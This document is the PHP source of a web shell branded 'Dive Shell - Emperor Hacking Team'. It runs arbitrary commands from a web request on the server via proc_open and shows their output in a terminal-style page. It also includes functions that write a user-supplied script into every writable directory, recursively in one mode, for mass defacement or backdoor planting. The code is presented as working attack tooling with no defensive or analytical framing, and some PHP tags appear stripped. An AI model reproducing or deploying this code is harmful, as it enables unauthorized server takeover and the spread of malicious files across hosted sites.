Dive Shell - Emperor Hacking Team

/*Emperor Hacking TEAM */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}

if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);

array_unshift($_SESSION['history'], $_REQUEST['command']);

$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";

if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {

if ($regs[1][0] == '/') {

$new_dir = $regs[1];
} else {

$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}

while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);

while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);

while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if ($new_dir == '') $new_dir = '/';

if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}

} else {

chdir($_SESSION['cwd']);

$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);

while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}

while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}

fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}

if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}

header('Content-Type: text/html; charset=UTF-8');

echo 'xml version="Dive.0.1" encoding="UTF-8"' . "\n";

Dive Shell - Emperor Hacking Team <title>Dive Shell - Emperor Hacking Team</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />

<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array( echo $js_command_hist );
var last = 0;

function key(e) {
if (!e) var e = window.event;

if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}

if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}

}

function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}

</script>

<body onload="init()" style="color: #00FF00; background-color: #000000">

<span style="background-color: #FFFFFF">

{
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "http://$lokasi/";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "<a href='http://$dirb/$namafile' target='_blank'>http://$dirb/$namafile
</a>";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}

}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "";
$u=getcwd();
echo "";
}
}

</span>

<p><font color="#FF0000"><span style="background-color: #000000"> Directory: </span> <code>
<span style="background-color: #000000"> echo $_SESSION['cwd'] </span></code>
</font></p>

<div style="width: 989; height: 456">
<p align="center">
<font color="#C0C0C0" face="Tahoma">Command:</font><input class="prompt" name="command" type="text"
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
 <font color="#0000FF">
</font>
 <textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">

$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);

</textarea> </p>
<p class="prompt" align="center">
<font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font>
</p>
<p class="prompt" align="center">
<font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></p>
<p class="prompt" align="center">
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080">

 </font></p>
</div>